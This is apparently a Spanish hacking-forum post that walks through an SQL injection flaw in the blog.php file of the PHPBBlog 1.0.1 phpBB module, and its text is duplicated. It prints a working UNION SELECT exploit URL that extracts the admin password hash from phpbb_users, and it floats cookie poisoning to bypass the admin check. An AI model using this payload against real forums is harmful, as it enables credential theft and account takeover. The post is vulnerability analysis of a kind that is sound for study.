Aquí otro ejemplo...
Script: PHPBBlog 1.0.1
Descripción: Modulo para los foros PHPbb
************************************************
* http://mods.phpbbfrench.com/phpBBlog_FR_v1.0.1.zip
************************************************
Archivo: blog.php
El problema
Línea 34: Se crea un switch para la variable "perform"
Línea 80: Si "perform" es igual a "edit"...
Línea 92: La variable "id" es recibida por el script...
Linea 94: Se ejecuta la siguiente sentencia SQL...
Pero la variable "id" nunca es comprobada por lo que la aplicacion se considera vulnerable a SQL Injection...
Exploit:
http://localhost/phpBB2/blog.php?perform=edit&id=1%20union%20select%20user_password%20from%20phpbb_users/*
Ni me molesto en publicar este exploit porque para poder ejecutarlo tengo que ser administrador del blog. Claro sirve para ver el username y password de el primer usuario del foro, quien suele ser el Administrador/God...jeje en fin el objetivo era dar un ejemplo más...bye

Script: PHPBBlog 1.0.1
Descripción: Modulo para los foros PHPbb
************************************************
* http://mods.phpbbfrench.com/phpBBlog_FR_v1.0.1.zip
************************************************
Archivo: blog.php
El problema
Línea 34: Se crea un switch para la variable "perform"
Código [Seleccionar]
switch($perform)Línea 80: Si "perform" es igual a "edit"...
Código [Seleccionar]
case 'edit':Línea 92: La variable "id" es recibida por el script...
Código [Seleccionar]
$id = (isset($HTTP_POST_VARS['id'])) ? $HTTP_POST_VARS['id'] : $HTTP_GET_VARS['id'];Linea 94: Se ejecuta la siguiente sentencia SQL...
Código [Seleccionar]
$sql = "SELECT text FROM " . BLOG_TABLE . " WHERE id = $id LIMIT 1";Pero la variable "id" nunca es comprobada por lo que la aplicacion se considera vulnerable a SQL Injection...
Exploit:
http://localhost/phpBB2/blog.php?perform=edit&id=1%20union%20select%20user_password%20from%20phpbb_users/*
Ni me molesto en publicar este exploit porque para poder ejecutarlo tengo que ser administrador del blog. Claro sirve para ver el username y password de el primer usuario del foro, quien suele ser el Administrador/God...jeje en fin el objetivo era dar un ejemplo más...bye

ah! tambien incluir cookie poisong (para bypass), ya que la cookie es uno de los principales objetivos al momento de explotar este bug... bueno espero opinen.